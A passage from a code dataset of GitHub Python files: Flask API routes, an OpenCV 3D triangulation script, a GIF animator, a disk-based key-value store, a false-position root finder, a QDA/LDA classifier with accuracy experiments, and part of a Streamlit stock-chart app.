2:\n\t\t\t\t\t\t\tfor sensordata in room_data[x]:\n\t\t\t\t\t\t\t\tif len(sensordata) != 2:\n\t\t\t\t\t\t\t\t\tlastTemp = sensordata[1]\n\t\t\t\t\t\t\t\t\tlastHum = sensordata[2]\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor powerdata in room_data[x]:\n\t\t\t\t\t\t\t\tif len(powerdata) == 2:\n\t\t\t\t\t\t\t\t\tif powerdata[1] == 0:\n\t\t\t\t\t\t\t\t\t\tlastPower = 1\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tlastPower = 0\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif len(data) == 2:\n\t\t\t\t\t\t#print(f'Iteration {i}, power_data |> sidste temp {lastTemp}, sidste hum {lastHum}')\n\t\t\t\t\t\tdata.insert(1, (x+1))\n\t\t\t\t\t\tdata.insert(3, lastTemp)\n\t\t\t\t\t\tdata.insert(4, lastHum)\n\t\t\t\t\t\tlastPower = data[2]\n\t\t\t\t\telse:\n\t\t\t\t\t\t#print(f'Iteration {i}, room_data |> sidste power {lastPower}')\n\t\t\t\t\t\tdata.insert(1, (x+1))\n\t\t\t\t\t\tdata.insert(2, lastPower)\n\t\t\t\t\t\tlastTemp = data[3]\n\t\t\t\t\t\tlastHum = data[4]\n\n\t\t\thouse_data = []\n\t\t\tfor x in range(num_rooms):\n\t\t\t\thouse_data.extend(room_data[x])\n\n\t\t\t#print(house_data)\n\t\t\thouse_data = sorted(house_data)\n\n\t\t\t#print(\"-------------------------\")\n\t\t\t#print(\"Færdig formateret\")\n\t\t\t#print(room_data)\n\n\t\t\thouse_data_json = {\"load\":house_data}\n\t\t\tprint(house_data_json)\n\t\t\treturn house_data_json, 200\n\n\telif sub == 'settings':\n\t\tif request.method =='GET':\n\t\t\t# ? Test me\n\t\t\t'''\n\t\t\tDB: return all user data\n\t\t\t1. get all user data\n\t\t\t2. format user data\n\n\t\t\tFormatering af json package:\n\t\t\t-------------------------\n\t\t\ttest_user_data = {\n\t\t\t\t'user_data': [\n\t\t\t\t\t['G7:1A:Y2:4T:80:40', 8.16, 22.06],\n\t\t\t\t\t['00:1A:C2:7B:00:50', 8.15, 23.07]\n\t\t\t\t]\n\t\t\t}\n\t\t\t'''\n\n\t\t\tuser_data = db.get_user_data()\n\t\t\tif user_data:\n\t\t\t\tfor user in user_data:\n\t\t\t\t\tdel user[0]\n\n\t\t\telse:\n\t\t\t\tuser_data = ''\n\n\t\t\tuser_json = {'user_data':user_data}\n\t\t\taction = 'User updated'\n\t\t\treturn user_json, 200\n\n\t\telif request.method == 'POST':\n\t\t\t# ? Test me\n\t\t\tmac_addr = request.form['mac_addr']\n\t\t\twork_start = int(request.form['work_start'])\n\t\t\twork_end = int(request.form['work_end'])\n\t\t\tsleep_start = int(request.form['bedtime'])\n\t\t\tsleep_end = int(request.form['wakeup_time'])\n\n\t\t\t'''\n\t\t\tDB: are the post-request data the same as the database data?\n\t\t\t1. get all user data\n\t\t\t2. for each mac-address in database, check if the\n\t\t\trequest.form['mac_addr'] equal any of these\n\t\t\t3. if it doesn't: create new user\n\t\t\t4. if it does:\n\t\t\t\t5. does the other request.form info match the database data?\n\t\t\t\t6. if it doesn't: update the user/mac in database with new info\n\t\t\t\t7. if it does: don't update or add anything\n\t\t\t'''\n\t\t\tsleep_end = sleep_end/100\n\t\t\tsleep = sleep_start+sleep_end\n\t\t\twork_end = work_end/100\n\t\t\twork = work_start+work_end\n\n\t\t\tuser_data = db.get_user_data()\n\t\t\tif user_data:\n\t\t\t\tfor user in user_data:\n\t\t\t\t\tif user[1] == mac_addr:\n\t\t\t\t\t\taction = f'User {mac_addr} updated'\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\taction = f'User {mac_addr} Created'\n\t\t\telse:\n\t\t\t\taction = 'First User Created'\n\t\t\tdata = (mac_addr, work, sleep)\n\t\t\tdb.insert_query(\"UI\", data)\n\n\t\t\treturn jsonify({'action': action}), 200\n\"\"\"\n@app.route(\"/database\", methods=['GET'])\ndef database():\n\tusers = User.query.all()\n\tuserinputs = UserInput.query.all()\n\tsensordata = SensorData.query.all()\n\n\n\treturn render_template('database.html', title=\"Database\", head=\"Database\", users=users, userinputs=userinputs, sensordata=sensordata)\n\t\"\"\"\n","repo_name":"CE-CF/P3-B3-209-Aflevering","sub_path":"control_unit/communication/coms/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":15034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11064044279","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 24 19:01:10 2023\n\n@author: fip\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom corners import getCornersFromImg\n\nA = np.array([[565.37877495, 0. , 321.32942885],\n [ 0. , 565.48666909, 181.99343463],\n [ 0. , 0. , 1. ]])\n\ndistCoefs_97f = np.array([[ 2.22609859e-01, -1.59712209e+00, -1.58796203e-03, 6.81037555e-04, 4.74766986e+00]])\nSQR_H, SQR_W = 19.7, 19.7\n\n\n\nfname = '../vids/checker_2.mp4'\ncap = cv2.VideoCapture(fname)\nplt.close('all')\n\n# params for ShiTomasi corner detection\nfeature_params = dict( maxCorners = 300,\n qualityLevel = 0.05,\n minDistance = 45,\n blockSize = 10 )\n\n# Parameters for lucas kanade optical flow\nlk_params = dict( winSize = (15, 15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n\ncap.set(cv2.CAP_PROP_POS_FRAMES,800)\nret, frame = cap.read()\ncorners0, gray0 = getCornersFromImg(frame)\nframe0 = cv2.cvtColor(gray0, cv2.COLOR_GRAY2BGR)\ncv2.imwrite(\"../meta_data/frame0.jpg\", frame0)\n\ncap.set(cv2.CAP_PROP_POS_FRAMES,830)\nret, frame = cap.read()\ncorners1, gray1 = getCornersFromImg(frame)\nframe1 = cv2.cvtColor(gray1, cv2.COLOR_GRAY2BGR)\ncv2.imwrite(\"../meta_data/frame1.jpg\", frame1)\n\nfor pt in corners0:\n cv2.circle(frame0, pt.astype(int), 6, (255,0,0), 4)\nfor pt in corners1:\n cv2.circle(frame1, pt.astype(int), 6, (255,0,0), 4)\n\nplt.figure(1)\nplt.subplot(121)\nplt.imshow(frame0)\nplt.subplot(122)\nplt.imshow(frame1)\n\n\np0 = cv2.goodFeaturesToTrack(gray0, mask = None, **feature_params)\np1, st, err = cv2.calcOpticalFlowPyrLK(gray0, gray1, p0, None, **lk_params)\np1g = p1[st==1]\np0g = p0[st==1]\n\nfor i, (new, old) in enumerate(zip(p1g, p0g)):\n a, b = new.ravel()\n c, d = old.ravel()\n frame0 = cv2.line(frame0, (int(a), int(b)), (int(c), int(d)), (255,0,0), 2)\n frame0 = cv2.circle(frame0, (int(c), int(d)), 5, (0,0,255), -1)\n frame1 = cv2.circle(frame1, (int(a), int(b)), 5, (0,0,255), -1)\n\nplt.figure(2)\nplt.subplot(121)\nplt.imshow(frame0)\nplt.subplot(122)\nplt.imshow(frame1)\n\nHRES, VRES = 640, 360\n\npts_w = np.zeros((81, 3))\nfor i in range(81):\n pts_w[i, 0] = (i//9-4)*SQR_H\n pts_w[i, 1] = (i%9-4)*SQR_W\n\n\nret0, rvec0, tvec0 = cv2.solvePnP(pts_w, corners0, A, None)\nret1, rvec1, tvec1 = cv2.solvePnP(pts_w, corners1, A, None)\narr = np.hstack((rvec0, tvec0, rvec1, tvec1))\nnp.savetxt(\"../meta_data/camsPos.txt\", arr)\n\nprojM0 = np.hstack((cv2.Rodrigues(rvec0)[0], tvec0))\nprojM1 = np.hstack((cv2.Rodrigues(rvec1)[0], tvec1))\n\np0g_u = cv2.undistortPoints(p0g, A, distCoefs_97f)\np1g_u = cv2.undistortPoints(p1g, A, distCoefs_97f)\n\npoints3d = cv2.triangulatePoints(projM0, projM1, p0g_u, p1g_u)\n\np3 = points3d[:3] / points3d[3, None] \np3.shape\n\nppts, jc = cv2.projectPoints(p3, rvec0, tvec0, A, distCoefs_97f)\nppts.shape\nppts = ppts[:,0,:]\n\nppts[0]\n\nplt.figure(3)\nfor pt in ppts[14:18]:\n cv2.circle(frame0, pt.astype(int), 3, (0,255,255), 2)\nplt.imshow(frame0)\n\ntrackWpts = np.array([[ 4.4759927, 305.8374 , -214.79953 , 212.62338 ],\n [-382.79422 , -113.78936 , -142.68068 , -142.18954 ],\n [ 239.43945 , 92.293106 , -10.213252 , -13.1673565]],\n dtype=np.float32)\n\n\nif 0:\n plt.close('all')\n fnums = np.arange(850,950,10)\n frnum = 100\n for frnum in fnums:\n cap.set(cv2.CAP_PROP_POS_FRAMES,frnum)\n ret, frame = cap.read()\n corners0, gray0 = getCornersFromImg(frame)\n frame0 = cv2.cvtColor(gray0, cv2.COLOR_GRAY2RGB)\n \n ret0, rvec0, tvec0 = cv2.solvePnP(pts_w, corners0, A, None)\n ppts0, jc0 = cv2.projectPoints(trackWpts, rvec0, tvec0, A, distCoefs_97f)\n\n ppts0 = ppts0[:,0,:]\n plt.figure()\n for pt in ppts0:\n cv2.circle(frame0, pt.astype(int), 6, (255,0,255), 4)\n plt.imshow(frame0)\n","repo_name":"fabioirigon/3d","sub_path":"src/depth_test.py","file_name":"depth_test.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"19852091441","text":"\"\"\"\nModule bundling all functions needed to animate an ANI file\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport shutil\nfrom PIL import Image\nfrom .helpers import split_ani, write_xyzs, write_pngs\n\n\ndef animate(anifile=None, width=None, height=None, loop=None, bonds_param=None, camera=None):\n \"\"\"Create a gif file from given ANI file\"\"\"\n if width is None:\n width = 1920\n if height is None:\n height = 1080\n if loop is None:\n loop = 0\n if bonds_param is None:\n bonds_param = 1.3\n fname = anifile.split(\".\")[0]\n frames = []\n imgfiles = write_pngs(write_xyzs(split_ani(anifile)), width, height, bonds_param, camera)\n print(\"\")\n for i, imgfile in enumerate(imgfiles):\n print(\"Creating GIF ({0}/{1})\".format(i + 1, len(imgfiles)), end=\"\\r\")\n new_frame = Image.open(imgfile)\n frames.append(new_frame)\n frames[0].save(\"{0}.gif\".format(fname),\n format=\"GIF\",\n append_images=frames[1:],\n save_all=True,\n duration=300,\n loop=loop,\n disposal=2)\n print(\"\\n{0}.gif is created\".format(fname))\n print(\"Deleting directory ANIAnimator_temp\")\n shutil.rmtree(\"ANIAnimator_temp\")\n print(\"Directory ANIAnimator_temp is deleted\")\n","repo_name":"eftalgezer/ANIAnimator","sub_path":"ANIAnimator/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24283209992","text":"from ... import serialization\nfrom .store import Store\nfrom collections import namedtuple\nfrom pathlib import Path\nimport contextlib\nimport functools\nimport shutil\nimport tempfile\nimport time\n\n\nPaths = namedtuple('Paths', 'key val')\n\n\ndef retry(on_exceptions=()):\n class Decorator:\n def __init__(self, func):\n self.func = func\n\n def __call__(self, retry_delays, instance, *args, **kwargs):\n for retry_delay in retry_delays:\n try:\n return self.func(instance, *args, **kwargs)\n except on_exceptions:\n time.sleep(retry_delay)\n return self.func(instance, *args, **kwargs)\n\n def __get__(self, instance, owner):\n f = functools.partial(self, instance.retry_delays, instance)\n functools.update_wrapper(f, self.func)\n return f\n return Decorator\n\n\nclass Disk(Store):\n def __init__(self, dir, tmpdir=None, create_dirs=True):\n self.dir = Path(dir)\n self.tmpdir = Path(tmpdir) if tmpdir is not None else self.dir\n self.retry_delays = [0.125, 0.25, 0.5, 1, 2, 4, 8]\n if create_dirs:\n (self.dir / 'keys').mkdir(parents=True, exist_ok=True)\n (self.dir / 'values').mkdir(parents=True, exist_ok=True)\n self.tmpdir.mkdir(parents=True, exist_ok=True)\n elif not self.dir.exists():\n raise ValueError(f'Store Directory {str(self.dir)} does not exist')\n\n def paths(self, key, root=None):\n \"\"\" Key Paths\n\n Parameters\n ----------\n key : CallNode\n The CallNode used as key\n root : Path\n The path the key paths use as root, default is self.dir\n\n Returns\n -------\n (Path, Path, Path)\n The path of the key, tag, and value files respectively\n \"\"\"\n if root is None:\n root = self.dir\n return Paths(key=root / 'keys' / key.sha256(),\n val=root / 'values' / key.sha256())\n\n @retry(on_exceptions=AssertionError)\n def key_invariant(self, key):\n paths = self.paths(key)\n if self.__contains__(key):\n assert paths.key.is_file()\n assert paths.val.is_file()\n else:\n assert not paths.key.is_file()\n assert not paths.val.is_file()\n\n def __contains__(self, key):\n return self.paths(key).key.is_file()\n\n @retry(on_exceptions=(KeyError, FileNotFoundError))\n def _load_value(self, key):\n if __debug__:\n self.key_invariant(key)\n\n if not self.__contains__(key):\n raise KeyError('KeyError: {}'.format(str(key)))\n\n with self.paths(key).val.open() as f:\n return serialization.load(f)\n\n def _load_tags(self, key):\n raise NotImplementedError\n\n def filter(self, *conditions):\n raise NotImplementedError\n\n def _store(self, key, value, **tags):\n with tempfile.TemporaryDirectory(dir=self.tmpdir) as tmpdir:\n tmpdir = Path(tmpdir)\n\n temp_paths = self.paths(key, root=tmpdir)\n real_paths = self.paths(key)\n\n with contextlib.ExitStack() as exit_stack:\n temp_paths.key.parent.mkdir(parents=True, exist_ok=True)\n temp_paths.val.parent.mkdir(parents=True, exist_ok=True)\n key_file = exit_stack.enter_context(temp_paths.key.open('w'))\n val_file = exit_stack.enter_context(temp_paths.val.open('w'))\n serialization.dump(key, key_file)\n serialization.dump(value, val_file)\n # If succeeded, move files\n shutil.copy(temp_paths.key, real_paths.key)\n shutil.copy(temp_paths.val, real_paths.val)\n\n if __debug__:\n self.key_invariant(key)\n\n def remove(self, key):\n paths = self.paths(key)\n paths.key.unlink()\n paths.val.unlink()\n\n def __getstate__(self):\n return self.dir, self.tmpdir, self.retry_delays\n\n def __setstate__(self, state):\n self.dir = state[0]\n self.tmpdir = state[1]\n self.retry_delays = state[2]\n self.dir.mkdir(parents=True, exist_ok=True)\n self.tmpdir.mkdir(parents=True, exist_ok=True)\n","repo_name":"equinor/xun","sub_path":"xun/functions/store/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"9952148839","text":"import sympy as sp\nimport numpy as np\n\nx=sp.symbols('x')\n\ndef funcion(func):\n global x\n return sp.sympify(func)\n\ndef Regla_falsa(ecua,a,b,tolera):\n global x\n ecuacion=funcion(ecua)\n tramo = abs(b-a)\n fa = ecuacion.evalf(subs={x:a})\n fb = ecuacion.evalf(subs={x:b})\n while not(tramo<=tolera):\n c = b - fb*(a-b)/(fa-fb)\n fc = ecuacion.evalf(subs={x:c})\n cambio = np.sign(fa)*np.sign(fc)\n if cambio>0:\n tramo = abs(c-a)\n a = c\n fa = fc\n else:\n tramo = abs(b-c)\n b = c\n fb = fc\n\n return c, tramo\n\nfun = input(\"Ingresa la funcion: \")\na = float(input(\"Ingresa intervalo a: \"))\nb = float(input(\"Ingresa intervalo b: \"))\ntol = float(input(\"Ingresa la tolerancia: \"))\n\n#(c,tramo)=Regla_falsa('x**3+x**2+2*x+1',-1,0,0.01)\n(Raiz,Error)=Regla_falsa(fun,a,b,tol)\n\n# SALIDA\nprint(\"\")\nprint('raiz: ',Raiz)\nprint('error: ',Error)","repo_name":"esyepesv/Numerical-Analysis","sub_path":"final delivery/Program/S-N-E-N-L/Regla_Falsa.py","file_name":"Regla_Falsa.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"26654178767","text":"\"\"\"\nUniversity of Liege\nELEN0062 - Introduction to machine learning\nProject 1 - Classification algorithms\n\"\"\"\n#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sre_compile import isstring\nimport numpy as np\n#from code.plot import plot_with_colors\n\nfrom sklearn.base import BaseEstimator, ClassifierMixin\n\n\n\n\nclass QuadraticDiscriminantAnalysis(BaseEstimator, ClassifierMixin):\n\n def fit(self, X, y, lda=False):\n \"\"\"Fit a linear discriminant analysis model using the training set\n (X, y).\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n The training input samples.\n\n y : array-like, shape = [n_samples]\n The target values.\n\n\n Returns\n -------\n self : object\n Returns self.\n \"\"\"\n # Input validation\n X = np.asarray(X, dtype=float)\n if X.ndim != 2:\n raise ValueError(\"X must be 2 dimensional\")\n\n y = np.asarray(y)\n if y.shape[0] != X.shape[0]:\n raise ValueError(\"The number of samples differs between X and y\")\n\n self.lda = lda\n\n # ====================\n self.priors = dict()\n self.means = dict()\n self.covs = dict()\n self.classes = np.unique(y) #[0. 1.]\n\n for c in self.classes: # pour chaque classe\n X_c = X[y == c]\n self.priors[c] = X_c.shape[0] / X.shape[0] # on calcule de la prior des 2 classes : prob de la class sur le dataset\n self.means[c] = np.mean(X_c, axis=0) # moyen des 2 classes\n\n if lda:\n self.covs[c] = np.cov(X, rowvar=False) # matrice de covariance du dataset\n else:\n self.covs[c] = np.cov(X_c, rowvar=False) # matrice de covariance des 2 classes\n\n return self\n # ====================\n\n\n def predict(self, X):\n \"\"\"Predict class for X.\n\n Parameters\n ----------\n X : array-like of shape = [n_samples, n_features]\n The input samples.\n\n Returns\n -------\n y : array of shape = [n_samples]\n The predicted classes, or the predict values.\n \"\"\"\n\n # ====================\n return self.predict_proba(X).argmax(axis=1)\n # ====================\n\n \n def predict_proba(self, X):\n \"\"\"Return probability estimates for the test data X.\n\n Parameters\n ----------\n X : array-like of shape = [n_samples, n_features]\n The input samples.\n\n Returns\n -------\n p : array of shape = [n_samples, n_classes]\n The class probabilities of the input samples. Classes are ordered\n by lexicographic order.\n\n \"\"\"\n\n # ====================\n prob_X = []\n\n for x in X:\n prob_x = []\n for c in self.classes:\n numerator = self.f(x, self.means[c], self.covs[c]) * self.priors[c]\n denominator = 0\n for c2 in self.classes:\n denominator += self.f(x, self.means[c2], self.covs[c2]) * self.priors[c2]\n prob_x.append(round (numerator / denominator,3))\n prob_X.append(prob_x)\n\n return np.array(prob_X)\n # ====================\n\n def f(self, x, mean, covmatrix):\n \"\"\"\n The density function of multivariate normal distribution.\n\n Parameters\n ---------------\n x: ndarray(float, dim=2)\n random vector, N by 1\n mean: ndarray(float, dim=1 or 2)\n the mean of x, N by 1\n covmatrix: ndarray(float, dim=2)\n the covarianece matrix of x, N by 1\n Returns\n -------\n density: float\n \n \"\"\"\n\n N = x.size\n\n temp1 = np.linalg.det(covmatrix) ** (-1/2)\n temp2 = np.exp(-.5 * (x - mean).T @ np.linalg.inv(covmatrix) @ (x - mean))\n\n return ( 1/( ((2 * np.pi) ** (N/2)) * temp1) ) * temp2\n\ndef compute_accuracy(prediction_classes,testingtargets):\n \"\"\" Return the mean accuracy on the given test data and labels\n\n Parameters\n ----------\n prediction_classes : array-like of shape [n_samples]\n Predicted labels for samples.\n\n testingtargets : array-like of shape [n_samples,] \n True labels for tested samples.\n\n\n Returns\n -------\n accuracy : float\n mean accuracy.\n \"\"\"\n assert len(prediction_classes) == len(testingtargets), \"In compute_accuracy(), prediction_classes and testingtargets must have the same length\"\n\n well_predicted_classes = 0\n\n for sample in range(len(testingtargets)): \n if prediction_classes[sample] == testingtargets[sample]:\n well_predicted_classes += 1\n\n accuracy = well_predicted_classes/len(testingtargets)\n return accuracy\n\n\ndef test_method(trainingfeatures,trainingtragets,testingfeatures,testingtargets,fname=None, lda=bool):\n \"\"\"\n Make an instance of qda or lda model depending on the provided data\n\n Parameters\n ---------------\n trainingfeatures:array-like of shape [n_samples,n_features]\n features of training samples.\n\n trainingtragets:array-like of shape [n_samples,] \n labels of training samples.\n\n testingfeatures:array-like of shape [n_samples,n_features]\n features of testing samples.\n\n testingtargets:array-like of shape [n_samples,] \n labels of testing samples.\n\n fname: str\n if a name is provided, then plot boundary pdf file is create\n in the same directory as this file \n lda: bool\n True : lda\n Flase : qda\n\n\n x: ndarray(float, dim=2)\n random vector, N by 1\n mean: ndarray(float, dim=1 or 2)\n the mean of x, N by 1\n covmatrix: ndarray(float, dim=2)\n the covarianece matrix of x, N by 1\n\n Returns\n -------\n accuracy : float\n std_deviation : float\n \n \"\"\"\n qda = QuadraticDiscriminantAnalysis()\n qda.fit(trainingfeatures, trainingtragets, lda)\n #proba_per_classes = qda.predict_proba(testingfeatures)\n prediction_classes = qda.predict(testingfeatures)\n\n accuracy = compute_accuracy(prediction_classes,testingtargets)\n\n if fname!=None:\n if fname.isstring:\n plot_boundary(fname,qda,testingfeatures, testingtargets, title=fname)\n\n return accuracy\n\n\ndef qst_3_2():\n # generate dataset\n features, labels = make_dataset2(1500,None) \n\n trainingfeatures = features[300:]\n trainingtragets = labels[300:]\n testingfeatures = features[:300]\n testingtargets = labels[:300]\n\n qda = QuadraticDiscriminantAnalysis()\n\n qda.fit(trainingfeatures, trainingtragets, lda=True) \n plot_boundary(\"3.2_lda_data2\",qda,testingfeatures, testingtargets, title=\"3.2_lda_data2\")\n proba_per_classes = qda.predict_proba(testingfeatures)\n prediction_classes = qda.predict(testingfeatures)\n accuracy = compute_accuracy(prediction_classes,testingtargets)\n print(\"lda accuracy :\",accuracy)\n\n qda.fit(trainingfeatures, trainingtragets, lda=False)\n plot_boundary(\"3.2_qda_data2\",qda,testingfeatures, testingtargets, title=\"3.2_qda_data2\")\n proba_per_classes = qda.predict_proba(testingfeatures)\n prediction_classes = qda.predict(testingfeatures)\n accuracy = compute_accuracy(prediction_classes,testingtargets)\n print(\"qda accuracy :\",accuracy)\n\n\ndef qst_3_3():\n #QDA-DT1\n accuracy_dataset1_qda_tmp = []\n\n #LDA-DT1\n accuracy_dataset1_lda_tmp = []\n\n #QDA-DT2\n accuracy_dataset2_qda_tmp = []\n\n #LDA-DT2\n accuracy_dataset2_lda_tmp = []\n\n\n for generation in range(5):\n\n rd = (generation+10)**4-111\n\n # datasets\n features2, labels2 = make_dataset2(1500,rd) \n trainingfeatures2 = features2[300:]\n trainingtragets2 = labels2[300:]\n testingfeatures2 = features2[:300]\n testingtargets2 = labels2[:300]\n\n features1, labels1 = make_dataset1(1500,rd) \n trainingfeatures1 = features1[300:]\n trainingtragets1 = labels1[300:]\n testingfeatures1 = features1[:300]\n testingtargets1 = labels1[:300]\n \n \n #QDA-DT1\n accuracy = test_method(trainingfeatures1,trainingtragets1,testingfeatures1,testingtargets1, lda=False)\n accuracy_dataset1_qda_tmp.append(accuracy)\n \n #QDA-DT2\n accuracy = test_method(trainingfeatures2, trainingtragets2,testingfeatures2,testingtargets2, lda=False)\n accuracy_dataset2_qda_tmp.append(accuracy)\n \n #LDA-DT1\n accuracy = test_method(trainingfeatures1, trainingtragets1,testingfeatures1,testingtargets1, lda=True)\n accuracy_dataset1_lda_tmp.append(accuracy)\n\n #LDA-DT2\n accuracy = test_method(trainingfeatures2, trainingtragets2,testingfeatures2,testingtargets2, lda=True)\n accuracy_dataset2_lda_tmp.append(accuracy)\n\n\n np.array(accuracy_dataset1_qda_tmp)\n np.array(accuracy_dataset1_lda_tmp)\n np.array(accuracy_dataset2_qda_tmp)\n np.array(accuracy_dataset2_lda_tmp)\n\n #QDA-DT1\n avg_accuracy_dataset1_qda = np.mean(accuracy_dataset1_qda_tmp) \n std_deviation_dataset1_qda = np.std(accuracy_dataset1_qda_tmp)\n print(\"QDA-DT1 acc : \",round(avg_accuracy_dataset1_qda,3) ,\"sdt : \", round(std_deviation_dataset1_qda,3))\n\n #QDA-DT2\n avg_accuracy_dataset2_qda = np.mean(accuracy_dataset2_qda_tmp) \n std_deviation_dataset2_qda = np.std(accuracy_dataset2_qda_tmp)\n print(\"QDA-DT2 acc : \",round(avg_accuracy_dataset2_qda,3) ,\"sdt : \", round(std_deviation_dataset2_qda,3))\n\n #LDA-DT1\n avg_accuracy_dataset1_lda = np.mean(accuracy_dataset1_lda_tmp) \n std_deviation_dataset1_lda = np.std(accuracy_dataset1_lda_tmp)\n print(\"LDA-DT1 acc : \",round(avg_accuracy_dataset1_lda,3) ,\"sdt : \", round(std_deviation_dataset1_lda,3))\n\n #LDA-DT2\n avg_accuracy_dataset2_lda = np.mean(accuracy_dataset2_lda_tmp) \n std_deviation_dataset2_lda = np.std(accuracy_dataset2_lda_tmp)\n print(\"LDA-DT2 acc : \",round(avg_accuracy_dataset2_lda,3) ,\"sdt : \", round(std_deviation_dataset2_lda,3))\n\n\nif __name__ == \"__main__\":\n #from data import make_data\n from plot import plot_boundary\n from data import make_dataset1, make_dataset2\n\n qst_3_2()\n qst_3_3()\n \n","repo_name":"ippo-m/ELEN0062-1-IML","sub_path":"code/qda.py","file_name":"qda.py","file_ext":"py","file_size_in_byte":10306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6600312076","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport joblib\n# Importing all required modules \nimport webbrowser as wb\nimport streamlit as st\nimport time\nfrom io import StringIO\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\n\n# -- Set page config\napptitle = 'Predict VN30-index price movement using financial news and technical analysis'\nst.set_page_config(page_title=apptitle, \n layout=\"wide\",\n page_icon=\"ЁЯзК\",\n initial_sidebar_state=\"expanded\")\n# page_icon=\"chart_with_upwards_trend\")\n\n# # Unpacking Scaler pkl file\nS_file = open('model_rf.pkl','rb')\n# S_file = open('model_svm.pkl','rb')\nscaler = joblib.load(S_file)\n\n# Function to print out put which also converts numeric output from ML module to understandable STR \ndef pred_out(num):\n if num == 1:\n st.info('THE VN30-INDEX WILL :green[BE UPTREND]', icon=\"тД╣я╕П\")\n else:\n st.info('THE VN30-INDEX WILL BE :red[DOWNTREND]', icon=\"тД╣я╕П\")\n\nst.title('Application :blue[Deep Learning] and :red[Machine Learning] in predicting VN30-index price movement using financial news and technical analysis')\n\n###############################################################################################\nimport plotly.graph_objects as go\ndf = pd.read_csv('vn30-his-2.csv')\ndf['Date'] = pd.to_datetime(df['Date'])\ndf = df.set_index('Date')\n\ntime_periods = {\n '5 years': pd.date_range(end=df.index[-1], periods=1260, freq=pd.tseries.offsets.BDay()),\n '1 year': pd.date_range(end=df.index[-1], periods=252, freq=pd.tseries.offsets.BDay()),\n '6 months': pd.date_range(end=df.index[-1], periods=120, freq=pd.tseries.offsets.BDay()),\n '3 month': pd.date_range(end=df.index[-1], periods=60, freq=pd.tseries.offsets.BDay()),\n '1 month': pd.date_range(end=df.index[-1], periods=20, freq=pd.tseries.offsets.BDay()),\n '2 week': pd.date_range(end=df.index[-1], periods=10, freq=pd.tseries.offsets.BDay()),\n '1 week': pd.date_range(end=df.index[-1], periods=5, freq=pd.tseries.offsets.BDay()),\n\n}\n\nfig = go.Figure(data=[go.Candlestick(x=df.index,\n open=df['Open'],\n high=df['High'],\n low=df['Low'],\n close=df['Close'])])\nfig.update_layout(\n height=800,\n showlegend=True,\n title_text=\"VN30-Index Candlestick chart from 2017 to 2023\",\n)\n########################################################################################\n# Define dropdown menu label and options\ndropdown_label = 'Select time period'\ndropdown_options = list(time_periods.keys())\n\n# Add dropdown menu to Streamlit app\ntime_period = st.selectbox(dropdown_label, dropdown_options)\n\n# Filter data for selected time period\nstart_date = time_periods[time_period][0]\ndf_filtered = df.loc[start_date:]\n\n# Update candlestick chart data\nfig.update_traces(x=df_filtered.index,\n open=df_filtered['Open'],\n high=df_filtered['High'],\n low=df_filtered['Low'],\n close=df_filtered['Close'])\n# ##########################################################################################\nsma_10_trace = go.Scatter(x=df_filtered.index, y=df_filtered['sma_10'], name='SMA-10', visible=True)\nsma_20_trace = go.Scatter(x=df_filtered.index, y=df_filtered['sma_20'], name='SMA-20', visible=True)\nema_10_trace = go.Scatter(x=df_filtered.index, y=df_filtered['ema_10'], name='EMA-10', visible=True)\nema_20_trace = go.Scatter(x=df_filtered.index, y=df_filtered['ema_20'], name='EMA-20', visible=True)\n\nfig.add_trace(sma_10_trace)\nfig.add_trace(sma_20_trace)\nfig.add_trace(ema_10_trace)\nfig.add_trace(ema_20_trace)\n# Update figure layout to adjust legend and axis labels\nfig.update_layout(\n legend=dict(\n orientation=\"h\",\n yanchor=\"bottom\",\n y=1.02,\n xanchor=\"right\",\n x=1\n ),\n xaxis_title=\"Date\",\n yaxis_title=\"Price\")\n\nfig.update_layout(xaxis_rangeslider_visible=False)\nst.plotly_chart(fig, theme=\"streamlit\", use_container_width=True)\n#########################################################################################\nrsi_7_trace = go.Scatter(x=df_filtered.index, y=df_filtered['rsi_7'], name='RSI-7', visible=True)\nrsi_9_trace = go.Scatter(x=df_filtered.index, y=df_filtered['rsi_9'], name='RSI-9', visible=True)\nrsi_14_trace = go.Scatter(x=df_filtered.index, y=df_filtered['rsi_14'], name='RSI-14', visible=True)\n\nfig_rsi = go.Figure(data=[rsi_7_trace,rsi_9_trace,rsi_14_trace])\n# Update figure layout to adjust legend and axis labels\nfig_rsi.update_layout(\n legend=dict(\n orientation=\"h\",\n yanchor=\"bottom\",\n y=1.02,\n xanchor=\"right\",\n x=1\n ),\n xaxis_title=\"Date\",\n yaxis_title=\"Price\"\n)\n\nfig_rsi.update_layout(xaxis_rangeslider_visible=False)\nst.plotly_chart(fig_rsi, theme=\"streamlit\", use_container_width=True)\n#########################################################################################\nfig2 = 